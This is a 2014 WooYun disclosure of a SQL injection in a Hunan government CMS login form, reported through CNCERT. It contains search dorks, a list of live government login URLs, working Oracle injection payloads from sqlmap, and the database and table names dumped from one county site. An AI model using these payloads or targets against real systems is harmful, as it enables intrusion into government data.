当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066195

漏洞标题:某政府类CMS通用SQL注入漏洞

相关厂商:Cncert国家互联网应急中心

漏洞作者:

提交时间:2014-06-27 12:14

修复时间:2014-09-25 12:16

公开时间:2014-09-25 12:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-27: 细节已通知厂商并且等待厂商处理中
2014-07-01: 厂商已经确认,细节仅向厂商公开
2014-07-04: 细节向第三方安全合作伙伴开放
2014-08-25: 细节向核心白帽子及相关领域专家公开
2014-09-04: 细节向普通白帽子公开
2014-09-14: 细节向实习白帽子公开
2014-09-25: 细节向公众公开

简要描述:

某政府类内容管理系统

详细说明:

1. 厂商:科创CMS ,官网:www.chinacreator.com
由于有别人提交过了此厂商的任意文件上传,这里摘取其二个关键字,跟提供一个关键字

inurl:comm_front
inurl:comm_front/email
访问科创网站 inurl:login.jsp


2.该内容管理系统多用于湖南省,在登陆处用户名存在注入,默认登录地址为*/login.jsp (案例可从官网客户以及谷歌关键字获取)
3.枚举一些影响案例:

http://www.hngzw.gov.cn/login.jsp 湖南省国资委内容管理系统
http://www.czsx.gov.cn/login.jsp 苏仙区政府门户网站内容管理系统
http://www.zixing.gov.cn/login.jsp 资兴市政府内容管理系统
http://www.czbeihu.gov.cn/login.jsp 北湖内容管理系统
http://www.hn408.org/login.jsp 湖南省残疾人就业信息网内容管理系统
http://yuanjiang.gov.cn/login.jsp 沅江市内容管理系统
http://www.hn12333.com:81/ 湖南人力资源社会保障公共服务网容管理系统
http://www.rc.gov.cn/login.jsp 汝城县人民政府门户网站内容管理系统
http://www.cetz.gov.cn/login.jsp 国家级长沙经济技术开发区网站内容管理系统
http://www.hnbzdj.com/login.jsp 湖南省知识产权局网站内容管理系统
http://www.hnrst.gov.cn/login.jsp 湖南省人力资源和社会保障厅内容管理系统
http://www.lwx.gov.cn:88/login.jsp 临武县人民政府内容管理系统
http://www.bhqrd.gov.cn/login.jsp 中国-北湖区人大网站内容管理系统
http://www.hnrm.gov.cn/login.jsp 湖南无线电管理内容管理系统
http://www.hngy.gov.cn/login.jsp 桂阳县政府门户网站内容管理系统
http://www.hunangtzy.com/login.jsp 湖南省国土资源信息网内容管理系统
http://www.hnipo.gov.cn/login.jsp 湖南省知识产权局内容管理系统
http://www.hnagri.gov.cn/login.jsp 湖南农药厅内容管理系统
http://zwgk.xiangtan.gov.cn/login.jsp 中国湘潭政府门户-政务公开内容管理系统
http://www.hunanpps.com/login.jsp 湖南省农业厅内容管理系统
http://www.hbt.hunan.gov.cn/login.jsp 湖南省环境保护厅内容管理系统


漏洞证明:

登录界面均为如下样式:

c1.jpg


c2.jpg

c3.jpg


c4.jpg


c5.jpg


以汝城县人民政府为例:
http://www.rc.gov.cn/login.jsp
POST:flag=yes&macaddr_=&machineName_=&machineIp_=&userName=admin&password=admin&subsystem_id=cms
userName参数存在注入

---
Place: POST
Parameter: userName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: flag=yes&macaddr_=&machineName_=&machineIp_=&userName=admin' AND 45
89=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(108)||CHR(110
)||CHR(113)||(SELECT (CASE WHEN (4589=4589) THEN 1 ELSE 0 END) FROM DUAL)||CHR(1
13)||CHR(110)||CHR(112)||CHR(110)||CHR(113)||CHR(62))) FROM DUAL)-- AMmm&passwor
d=admin&subsystem_id=cms
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: flag=yes&macaddr_=&machineName_=&machineIp_=&userName=admin' AND 31
09=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(77)||CHR(87)||CHR(116),5)-- FFzU&passw
ord=admin&subsystem_id=cms
---
[15:44:48] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:44:48] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\www.rc.gov.cn'


available databases [21]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] RUCHENG
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


当前数据库中的表:

Database: RUCHENG
[166 tables]
+--------------------------------+
| AGENT_WORKLOAD |
| ASSIGNMENT_AGENT |
| CMS_GUESTINFO |
| CMS_INTERVEW_ANSWER |
| CMS_INTERVIEW |
| CMS_INTERVIEWDETAIL |
| CMS_INTERVIEWPHOTO |
| CMS_INTERVIEW_RELATION |
| CMS_LIVECONTEXT |
| CMS_LIVEGC |
| CMS_LIVEGRAPHICS |
| CMS_LIVEGRAPHICS2 |
| CMS_VIDEOFILE |
| CMS_VIDEOFILE2 |
| PLAN_TABLE |
| TABLEINFO |
| TB_CMS_DOC_KIND |
| TB_CMS_DOC_LEVEL |
| TB_CMS_DOC_OPER |
| TB_CMS_DOC_STATUS |
| TB_CMS_DOC_STATUS_TRANS |
| TB_CMS_FLOW |
| TB_CMS_FLOW_DOC_TRANS |
| TB_SM_INPUTTYPE |
| TD_CMS_ADDWATERIMAGE |
| TD_CMS_CHANNEL |
| TD_CMS_CHANNELFIELD |
| TD_CMS_CHANNEL_VOTE |
| TD_CMS_CHNL_REF_DOC |
| TD_CMS_COLLECT_ANSWER |
| TD_CMS_COLLECT_IPCTRL2 |
| TD_CMS_COLLECT_TIMECTRL2 |
| TD_CMS_COLLECT_TITLE |
| TD_CMS_CUSTOM_FORM |
| TD_CMS_DBTSEARCH_DETAIL |
| TD_CMS_DOCCOMMENT_DICT |
| TD_CMS_DOCCOM_IMPEACHINFO |
| TD_CMS_DOCSOURCE |
| TD_CMS_DOCUMENT |
| TD_CMS_DOCUMENT_TEMP |
| TD_CMS_DOC_AGGREGATION |
| TD_CMS_DOC_ARRANGE |
| TD_CMS_DOC_ATTACH |
| TD_CMS_DOC_COMMENT |
| TD_CMS_DOC_DIST_MANNER |
| TD_CMS_DOC_PUBLISHING |
| TD_CMS_DOC_RELATED |
| TD_CMS_DOC_TASK |
| TD_CMS_DOC_TASK_DETAIL |
| TD_CMS_DOC_TEMPLATE |
| TD_CMS_DOC_VER |
| TD_CMS_DOC_VER_ATTACH |
| TD_CMS_EXTFIELD |
| TD_CMS_EXTFIELDVALUE |
| TD_CMS_EXTVALUESCOPE |
| TD_CMS_FILE_CHANGE_LOG |
| TD_CMS_FILE_STATUS |
| TD_CMS_MAILSERVERINFO |
| TD_CMS_ORDERPUBLISH |
| TD_CMS_PUBOBJECT_RELATION |
| TD_CMS_SITE |
| TD_CMS_SITEAPPS |
| TD_CMS_SITEFIELD |
| TD_CMS_SITEUSER |
| TD_CMS_SITE_SEARCH |
| TD_CMS_SITE_TPL |
| TD_CMS_TEMPLATE |
| TD_CMS_TEMPLATE_STYLE |
| TD_CMS_TMPL_EXPORT |
| TD_CMS_VOTE_ANSWER |
| TD_CMS_VOTE_IPCTRL |
| TD_CMS_VOTE_ITEMS |
| TD_CMS_VOTE_QUESTIONS |
| TD_CMS_VOTE_TIMECTRL |
| TD_CMS_VOTE_TITLE |
| TD_CMS_VOTE_TQ |
| TD_COMM_APPLICATION |
| TD_COMM_APPLICATION_ORGINFO |
| TD_COMM_APPLICATION_PERSONINFO |
| TD_COMM_APPLICATION_RELATION |
| TD_COMM_EMAIL |
| TD_COMM_EMAILTYPE |
| TD_COMM_EMAIL_DISPOSEDEP |
| TD_COMM_LEAVEWORDS |
| TD_COMM_OVERTURE |
| TD_COMM_OVERTURE_STATUS |
| TD_COMM_OVERTURE_TYPE |
| TD_COMM_PUBLICINFO_CLASS |
| TD_COMM_TABLE |
| TD_COMM_TABLE_TRANSMIT_INFO |
| TD_COMM_TIME |
| TD_COMM_TZZX |
| TD_COMM_TZZX_TRANSMIT_INFO |
| TD_COMM_USERQUERY |
| TD_COMM_XLHF |
| TD_COMM_ZFTS |
| TD_COMM_ZFTS_CLASS |
| TD_COMM_ZFTS_TRANSMIT_INFO |
| TD_REMINDINFO |
| TD_SD_NOTEPAPER |
| TD_SD_NOTIC |
| TD_SD_RATIFYADVICE |
| TD_SD_REMIND |
| TD_SD_SCHEDULAR |
| TD_SD_SHARE |
| TD_SEC_SMS_INTERFACE |
| TD_SM_DICATTACHFIELD |
| TD_SM_DICTDATA |
| TD_SM_DICTKEYWORDS |
| TD_SM_DICTTYPE |
| TD_SM_GROUP |
| TD_SM_GROUPROLE |
| TD_SM_INITYEAR_HOLIDAY |
| TD_SM_JOB |
| TD_SM_JOBROLE |
| TD_SM_LOG |
| TD_SM_LOGDETAIL |
| TD_SM_LOGDETAIL_HIS |
| TD_SM_LOGMODULE |
| TD_SM_LOG_HIS |
| TD_SM_ORGANIZATION |
| TD_SM_ORGANIZATION_BASEINFO |
| TD_SM_ORGANIZATION_LEADER |
| TD_SM_ORGANIZATION_SECONDE |
| TD_SM_ORGJOB |
| TD_SM_ORGJOBROLE |
| TD_SM_ORGMANAGER |
| TD_SM_ORGROLE |
| TD_SM_ORGUSER |
| TD_SM_PERMISSION_ORIGINE |
| TD_SM_RES |
| TD_SM_ROLE |
| TD_SM_ROLERESOP |
| TD_SM_ROLETYPE |
| TD_SM_TAXCODE_ORGANIZATION |
| TD_SM_USER |
| TD_SM_USERGROUP |
| TD_SM_USERJOBORG |
| TD_SM_USERJOBORG_HISTORY |
| TD_SM_USERROLE |
| TD_SM_USER_ADDONS |
| TD_SP_ACCESSORIES |
| TD_SP_ATTACHMENT |
| TD_SP_BASEINFO |
| TD_SP_BASEINFO_CATALOG |
| TD_SP_CATALOG |
| TD_SP_CONSULTATION |
| TD_SP_GUIDE |
| TD_SP_LAW_RULE |
| TD_SP_LAW_RULE_CATALOG |
| TD_SP_ORGANIZATION |
| TD_SP_PRINTTEMPLATE |
| TD_SP_PROJECT |
| TD_SP_QUESTION |
| TD_SP_QUESTION_CATALOG |
| TD_SP_TRANSACTONLINE |
| TD_SP_TRANSACTONLINE_INFO |
| TD_WEB_TEST_DQ |
| TD_WEB_TEST_ITEM |
| TD_WEB_TEST_LOG |
| TD_WEB_TEST_QUESTIONS |
| TL_CMS_DOC_OPER_LOG |
| TL_CMS_SITE_FLOW_HIS |
| T_ACCESSLOG_WEBPAGECOUNT |
| T_ACCESSLOG_WEBSITECOUNT |
| X_TD_CMS_PUBLISHSCHEDULAR |
+--------------------------------+


有的虽然有验证码,但是手工注入也是没问题的

修复方案:

联系科创CMS,以及通报所涉及政府网站

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-07-01 23:12

厂商回复:

CNVD确认并复现所述情况(多个实例认定通用性),根据测试情况,主要涉及湖南一省,已经转由CNCERT下发给湖南分中心,由其后续协调网站管理单位以及软件生产厂商处置。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-06-27 12:22 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    @xsser @疯狗 这个厂商别人提交的是前台,怎么到我这就小厂商了?

  2. 2014-06-27 16:08 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @魇 因为你刷rank刷的太多了

  3. 2014-06-27 16:09 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    @U神 快上Q

  4. 2014-09-25 16:18 | 卡农的保镖 ( 路人 | Rank:4 漏洞数:3 | 好)

    洞主如此邪恶